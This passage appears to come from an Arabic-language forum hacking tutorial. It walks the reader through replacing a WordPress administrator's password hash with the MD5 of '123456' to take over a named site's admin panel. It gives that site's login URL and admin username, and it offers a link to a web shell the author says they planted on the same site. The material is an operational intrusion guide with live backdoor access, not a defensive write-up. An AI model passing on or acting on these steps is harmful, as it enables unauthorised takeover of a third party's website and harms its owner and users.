هل تصدق انه يوجد لشخص كلمة مرور بهذا الطول والتعقيد؟! اكيد لا ، فهذه كلمة المرور مشفره وكلمة المرور قبل التشفير هي scamper
يعني اكتب في جوجل MD5 generator ، وادخل الى احد مواقع التشفير ، وشفر scamper رح تطلع النتيجة e72cf84b5f3bfa195da2ec0b5aace442

الحين انت تقدر تعدله وتحط كلمة المرور تبعتك مشفره ومن ثم تضغط Confirm ،
او تكتبت كلمة المراور حقك مثلاً 123456 وتضغط على السهم اللي جنبه ثم
تختار MD5
كما في الصورة التالية



ثم نضغط Confirm
يفتح لنا صفحة جديدة ، اضغط على Yes كما في الصورة التالية



الحين تم تغيير البيانات ، وانت الان المدير
وتقدر الان تدخل على لوحة التحكم عن طريق البيانات
بحيث كلمة المرور هي 123456 واسم المدير هو xbtudlme
وندخل على لوحة التحكم عن طريق الرابط التالي وندخل البيانات
http://fullyvetted.com/wp-admin

ومبروك عليك اختراق المنتدى

وهذا شيل على الموقع مني هدية للتجربة ، بتمنى تستعملوه بعقل وما تخترقوا
الموقع اللي مرفوع عليه الشيل على شان يستفيدوا الاعضاء اكثر
الشيل الجديد
http://fullyvetted.com/asdely.php


الى هنا انتهى الدرس
ارجوا الدعاء لي ولوالديّ

بالتوفيق للجميع.!


في رعاية الرحمن